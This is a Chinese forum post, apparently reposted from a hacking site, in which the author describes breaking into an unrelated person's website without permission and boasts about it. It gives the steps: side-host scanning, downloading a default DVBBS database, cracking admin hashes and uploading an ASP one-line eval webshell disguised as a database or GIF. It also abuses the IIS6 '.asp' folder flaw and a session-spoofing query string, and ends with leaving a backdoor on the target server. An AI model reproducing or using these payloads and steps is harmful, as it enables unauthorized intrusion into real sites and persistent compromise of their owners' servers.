轉(zhuǎn)自：http://www.wrsky.com/read.php?tid=565
作者：firefox+lvhuana


今天上午上網(wǎng)的時候，非常無聊，好友都不在線。

正在無聊的時候，突然qq響了，一個陌生人要加我，順便先看下他的資料，哦哦，原來這個人還有個人站點呢，通過他加我請求。然后開始看他的個人站點，原來是一個外掛站，暈糊中，外掛站點的人加我作什么。。。。

想想進(jìn)他的站點看看吧，打開明小子的旁注工具2.2版本（這個啟動速度快，我喜歡），掃了一下，看到他站點所在的服務(wù)器上面還有幾個站點，再仔細(xì)掃了一下，發(fā)現(xiàn)一個dvbbs7.1的論壇的數(shù)據(jù)庫是默認(rèn)的dvbbs7.mdb，下載之，然后殺毒軟件查下沒有木馬存在（現(xiàn)在有些無聊的人喜歡放一個默認(rèn)數(shù)據(jù)庫名字的木馬來釣魚。。小心為好），打開數(shù)據(jù)庫找到管理員的后臺賬號密碼和前臺賬號密碼散列，破解一下吧，運氣不錯，幾分鐘md5的散列破解完畢了，全數(shù)字的前臺密碼。

登陸進(jìn)去，再登陸進(jìn)后臺。好久不搞國內(nèi)站了，手生中。。。。老思路，上傳一個自己制作的asp語句插入gif圖片中的asp木馬（當(dāng)然是更改為.gif了）。上傳成功，然后到后臺去還原數(shù)據(jù)庫去，暈乎乎的，怎么提示無法識別的數(shù)據(jù)庫格式，失敗了。?？磥韯泳W(wǎng)現(xiàn)在成熟的多了，估計是對文件的頭部做了識別了？？接著想辦法吧。。

看到現(xiàn)在7.1版本的都有了blog功能了，在后臺看看blog設(shè)置吧，突然看到有上傳設(shè)置哦，而且還可以設(shè)置上傳類型，增加一個mdb的文件格式吧，不錯不錯，增加成功。然后自己在本地建立一個空的mdb數(shù)據(jù)庫，里面的內(nèi)容為<%eval(request(\"lv\"))%>，然后把這個數(shù)據(jù)庫上傳，成功上傳，再暈，怎么不是直接顯示出相對路徑的？而是fileid=1。。再到后臺的blog管理那里找，找到上傳的文件夾是Boke/UploadFile/，然后在上傳管理那里找到了我上傳的mdb文件，這下看看動網(wǎng)還能禁止我還原數(shù)據(jù)庫么??？

成功還原數(shù)據(jù)庫為.asp了，嘿嘿，一個webshell到手了，然后進(jìn)入服務(wù)器，發(fā)現(xiàn)是win2k3的哦，看來執(zhí)行cmd是沒戲了，到處轉(zhuǎn)轉(zhuǎn)后找到d盤竟然能遍歷，還有ser-u安裝在d盤啊，瀏覽ServUDaemon.ini找到了目標(biāo)站的物理路徑，跳轉(zhuǎn)到目標(biāo)站的目錄，然后留后門，好了，玩完了，撤退。

鑒于是win2k3系統(tǒng)的，大家都應(yīng)該知道win2k3的一個文件夾名如果是.asp的話，這個文件夾里面的任何文件都做為asp來處理的，讓我們再深入測試一下。在后臺備份那里把備份路徑改一下，改為.asp/，如果害怕失敗的話，就用url編碼一下那個.，就是%2easp/，然后備份數(shù)據(jù)庫，這樣就會得到一個.asp的目錄，然后在上傳設(shè)置那里把文件上傳目錄設(shè)置為.asp/，這樣的話，所有的文件都上傳到這個文件夾里了?；氐角芭_，上傳我的那個把一句話木馬插入gif文件的那個2006s.gif，上傳成功后，http://www.****.com/.asp/2006-2/200622714435439658.gif這個就是我們的shell了。用客戶端連接，得到一個2006的webshell，不過輸入密碼后進(jìn)入的時候會返回一個404錯誤，原因是ie把.asp后面的省略了，再次把http://www.*****.com/.asp/2006-2/200622714435439658.gif放在?%23=Execute(Session(%22%23%22))&pageName=PageList前面，seesion欺騙了一下，這個webshell就能正常使用了。


垃圾文章，可能還有其他更簡單的方法，希望大家誰知道告訴一下。

最新評論